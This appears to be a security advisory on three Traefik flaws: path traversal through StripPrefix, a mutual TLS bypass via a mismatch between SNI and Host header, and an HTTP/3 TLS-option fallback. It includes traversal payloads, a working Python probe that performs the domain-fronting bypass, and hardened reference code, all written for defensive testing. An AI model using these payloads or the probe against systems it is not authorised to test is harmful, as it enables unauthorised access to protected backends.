SB2026070350 - Multiple vulnerabilities in Traefik

Published: July 3, 2026

Security Bulletin ID: SB2026070350
CSH Severity: High
Patch available: YES
Number of vulnerabilities: 3
Exploitation vector: Remote access
Highest impact: Data manipulation

Breakdown by Severity

High 100%

Description

This security bulletin contains information about 3 vulnerabilities.


1) Incorrect authorization (CVE-ID: CVE-2026-48020)

CWE-ID: CWE-863 - Incorrect Authorization

CVSSv4: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:U/U:Amber


The vulnerability allows a remote attacker to bypass route-level authentication and authorization and access protected backend paths.

The vulnerability exists due to incorrect authorization in the StripPrefix middleware when it processes request paths that contain .. or its percent-encoded form %2e%2e on PathPrefix-based public routes. The public router matches its prefix against the path as received, and StripPrefix then removes that prefix, so the dot segments are carried into the path forwarded to the backend. A remote attacker can therefore send a specially crafted request that is routed by the unauthenticated public router yet resolves, on the backend, to a path that a separate router protects with authentication and authorization.

Exploitation requires a configuration in which a public router uses PathPrefix together with StripPrefix while a separate router protects backend paths such as admin or internal endpoints.
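The following is an added example, not Traefik's code, that models the routing mistake described above so the bypass can be traced step by step. Router names, the /public and /admin prefixes, and the assumption that the upstream application decodes percent-encoding and collapses dot segments are all constructed for the illustration; the hardened variant rejects non-canonical paths before any router is consulted.

```python
"""Model of PathPrefix + StripPrefix routing with and without path canonicalisation.

Added example, not Traefik's code. Two routers share one entrypoint: an unauthenticated
one matching PathPrefix("/public") that strips the prefix, and an authenticated one for
"/admin". The backend's normalisation behaviour is an assumption about the upstream app.
"""
from posixpath import normpath
from typing import Optional, Tuple
from urllib.parse import unquote

# Constructed configuration mirroring the bulletin's precondition (hypothetical names).
ROUTERS = (
    {"name": "public", "prefix": "/public", "strip_prefix": True, "auth": False},
    {"name": "admin", "prefix": "/admin", "strip_prefix": False, "auth": True},
)


def match_router(path: str) -> Optional[dict]:
    """Longest PathPrefix match on the path exactly as received (no decoding, no normalisation)."""
    best = None
    for router in ROUTERS:
        prefix = router["prefix"]
        if path == prefix or path.startswith(prefix + "/"):
            if best is None or len(prefix) > len(best["prefix"]):
                best = router
    return best


def backend_view(path: str) -> str:
    """What an upstream that percent-decodes and collapses '.'/'..' segments will serve (assumed)."""
    return normpath(unquote(path)) or "/"


def naive_dispatch(raw_path: str) -> Optional[Tuple[str, bool, str]]:
    """Vulnerable pattern: match and strip on the raw path, forward the remainder untouched.

    Returns (router name, whether auth was enforced, path as the backend resolves it).
    """
    router = match_router(raw_path)
    if router is None:
        return None
    forwarded = raw_path[len(router["prefix"]):] if router["strip_prefix"] else raw_path
    return router["name"], router["auth"], backend_view(forwarded or "/")


def has_dot_segments(raw_path: str) -> bool:
    """True if the decoded path carries '.' or '..' segments or an interior empty segment ('//')."""
    segments = unquote(raw_path).split("/")[1:]  # leading slash yields an empty first element
    if any(segment in (".", "..") for segment in segments):
        return True
    return any(segment == "" for segment in segments[:-1])  # a trailing slash is still allowed


def hardened_dispatch(raw_path: str) -> Optional[Tuple[str, bool, str]]:
    """Reject non-canonical paths before routing, so a stripped remainder cannot climb out of /public."""
    if has_dot_segments(raw_path):
        return None  # answer 400 Bad Request in practice
    return naive_dispatch(raw_path)


if __name__ == "__main__":
    for probe in ("/public/index.html", "/public/../admin/users", "/public/%2e%2e/admin/users"):
        print(f"{probe:32} naive={naive_dispatch(probe)} hardened={hardened_dispatch(probe)}")
```

With the naive dispatcher both traversal forms are routed by the public router with no authentication, yet the backend resolves them to /admin/users; the hardened dispatcher refuses them and still serves /public/index.html unchanged.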


2) Authentication bypass using an alternate path or channel (CVE-ID: CVE-2026-48491)

CWE-ID: CWE-288 - Authentication Bypass Using an Alternate Path or Channel

CVSSv4: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N/E:U/U:Amber


The vulnerability allows a remote attacker to bypass mutual TLS authentication and access protected backends.

The vulnerability exists due to improper authentication in SNICheck when it resolves TLSOptions for wildcard host rules during domain-fronted HTTPS or HTTP/2 requests. The TLS options applied to a connection, including any client certificate requirement, are selected from the server name (SNI) presented in the handshake, whereas the router a request reaches is selected from its Host header (or HTTP/2 :authority). A remote attacker can complete a TLS handshake using a permissive SNI served on the same entrypoint and then send a request whose Host header names a wildcard-protected backend, bypassing the mutual TLS authentication that the backend's TLSOptions require.

Exploitation requires a wildcard-protected router with stricter TLS options and another, permissive SNI served on the same entrypoint.
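The following is an added example, not part of the bulletin or of Traefik, for testing an instance you operate: it performs the two steps described above, a TLS handshake under one server name and a plain HTTP/1.1 request whose Host header names another. The hostnames, port and path are placeholders; the probe sends nothing beyond a single GET.

```python
"""Domain-fronting probe: TLS handshake with one SNI, HTTP/1.1 request with a different Host.

Added example, not Traefik's code. Run it against your own entrypoint with a permissive SNI
(e.g. public.example.com) and a wildcard-protected Host (e.g. db.internal.example.com);
both names are placeholders.
"""
import socket
import ssl
from typing import Optional


def build_fronted_request(host: str, path: str = "/") -> bytes:
    """Plain HTTP/1.1 request whose Host header names the wildcard-protected backend."""
    return (
        f"GET {path} HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        "Connection: close\r\n"
        "\r\n"
    ).encode("ascii")


def parse_status(response: bytes) -> Optional[int]:
    """Status code from the first response line, or None if no HTTP status line came back."""
    parts = response.split(b"\r\n", 1)[0].split(b" ")
    if len(parts) >= 2 and parts[0].startswith(b"HTTP/") and parts[1].isdigit():
        return int(parts[1])
    return None


def probe(address: str, port: int, sni: str, host: str,
          path: str = "/", timeout: float = 5.0) -> Optional[int]:
    """Handshake with `sni`, request `host`; return the status code or None when refused."""
    ctx = ssl.create_default_context()
    ctx.check_hostname = False          # probe only: routing, not certificate validity, is under test
    ctx.verify_mode = ssl.CERT_NONE
    ctx.set_alpn_protocols(["http/1.1"])  # keep to HTTP/1.1 so the raw request above is valid
    try:
        with socket.create_connection((address, port), timeout=timeout) as raw:
            with ctx.wrap_socket(raw, server_hostname=sni) as tls:
                tls.sendall(build_fronted_request(host, path))
                chunks = []
                while True:
                    data = tls.recv(4096)
                    if not data:
                        break
                    chunks.append(data)
        return parse_status(b"".join(chunks))
    except OSError:
        return None  # handshake rejected, connection reset or closed before a status line


if __name__ == "__main__":
    # Placeholder target; replace with the address of your own entrypoint.
    print(probe("192.0.2.10", 443, sni="public.example.com", host="db.internal.example.com"))
```

Compare the result with a direct connection that uses the protected hostname as SNI and presents no client certificate: that connection should be refused at the handshake, and the fronted request should not fare better. A backend response to the fronted request, with no client certificate presented, is the behaviour this bulletin describes.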


3) Authentication bypass using an alternate path or channel (CVE-ID: CVE-2026-53622)

CWE-ID: CWE-288 - Authentication Bypass Using an Alternate Path or Channel

CVSSv4: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:U/U:Amber


The vulnerability allows a remote attacker to bypass client certificate authentication and access protected backends.

The vulnerability exists due to authentication bypass using an alternate path or channel in the HTTP/3 TLS configuration selection logic when handling QUIC handshakes for wildcard or mixed-case hostnames. A remote attacker can send a crafted HTTP/3 request whose SNI value is covered by a router-specific TLSOptions rule but does not match it as written (a wildcard-covered or mixed-case hostname), causing the selection logic to fall back to the default TLS configuration, which in the affected setup does not enforce the client certificate requirement. The request then reaches a backend protected by client certificate authentication without presenting a certificate.

Exploitation requires HTTP/3 to be enabled on the affected entrypoint, router-specific TLSOptions that enforce client certificate authentication, a weaker default TLS configuration, and that the attacker can reach the UDP entrypoint used by HTTP/3.
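The following is an added example, not Traefik's code, that models the server-side selection of TLS options by hostname for issues 2 and 3 above: an exact, case-sensitive lookup that lets wildcard-covered or mixed-case names fall back to the weaker default (issue 3), beside a lookup that canonicalises the name and honours wildcards, and a gate that re-checks the connection against the options of the router the Host header actually selects (issue 2). Hostnames, option names and the one-label wildcard semantics are assumptions made for the illustration.

```python
"""Model of TLS-options selection by hostname, vulnerable lookup beside a hardened one.

Added example, not Traefik's code. HOST_OPTIONS, the option labels and the hostnames
are constructed placeholders.
"""
from dataclasses import dataclass
from typing import Dict


@dataclass(frozen=True)
class TLSOptions:
    name: str
    client_auth: str  # "NoClientCert" or "RequireAndVerifyClientCert" (assumed labels)

    def requires_client_cert(self) -> bool:
        return self.client_auth == "RequireAndVerifyClientCert"


DEFAULT = TLSOptions("default", "NoClientCert")             # the weaker fallback options
STRICT = TLSOptions("mtls", "RequireAndVerifyClientCert")   # router-specific options

# Constructed host rules: one permissive name, one wildcard and one exact mTLS-protected name.
HOST_OPTIONS: Dict[str, TLSOptions] = {
    "public.example.com": DEFAULT,
    "*.internal.example.com": STRICT,
    "admin.example.com": STRICT,
}


def naive_select(sni: str) -> TLSOptions:
    """Exact, case-sensitive lookup: a name that misses silently receives DEFAULT."""
    return HOST_OPTIONS.get(sni, DEFAULT)


def canonical(name: str) -> str:
    """Lower-case, drop a trailing dot and a :port suffix (Host headers may carry one)."""
    name = name.strip().lower().rstrip(".")
    if name.count(":") == 1:  # leave bracketed IPv6 literals alone
        name = name.split(":", 1)[0]
    return name


_EXACT = {canonical(k): v for k, v in HOST_OPTIONS.items() if not k.startswith("*.")}
_WILDCARD = {canonical(k[2:]): v for k, v in HOST_OPTIONS.items() if k.startswith("*.")}


def hardened_select(hostname: str) -> TLSOptions:
    """Case-insensitive lookup honouring one-label wildcards; DEFAULT only when no rule covers the name."""
    name = canonical(hostname)
    if name in _EXACT:
        return _EXACT[name]
    first, _, rest = name.partition(".")
    if first and rest in _WILDCARD:
        return _WILDCARD[rest]
    return DEFAULT


def handshake_ok(options: TLSOptions, client_cert_presented: bool) -> bool:
    """A connection satisfies the options if it presented a client cert or none is required."""
    return client_cert_presented or not options.requires_client_cert()


def request_allowed(sni: str, host: str, client_cert_presented: bool) -> bool:
    """Gate applied once the Host header (or HTTP/2 :authority) is known.

    The connection must satisfy the options of the router the request actually selects,
    not only the options chosen from the SNI at handshake time.
    """
    if not handshake_ok(hardened_select(sni), client_cert_presented):
        return False
    return handshake_ok(hardened_select(host), client_cert_presented)


if __name__ == "__main__":
    for name in ("Admin.Example.com", "db.internal.example.com"):
        print(name, "naive:", naive_select(name).name, "hardened:", hardened_select(name).name)
    print("fronted request without cert:",
          request_allowed("public.example.com", "db.internal.example.com", False))
```

A mixed-case or wildcard-covered SNI reaches the naive lookup as DEFAULT, so a handshake without a client certificate is accepted; the hardened lookup resolves both to the mTLS options. For the fronted case, checking the SNI alone passes, while request_allowed refuses the request because the Host-selected router demands a certificate the connection never presented. Keeping the default options at least as strict as any router-specific options removes the weaker fallback altogether.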


Remediation

Install the update from the vendor's website. Until it is applied, the preconditions listed for each issue point to interim mitigations: do not pair a PathPrefix plus StripPrefix public router with protected paths on the same backend, do not serve a permissive SNI on an entrypoint that also hosts wildcard routers with stricter TLS options, keep the default TLS options no weaker than any router-specific ones, and disable HTTP/3 on entrypoints that rely on router-specific client certificate authentication.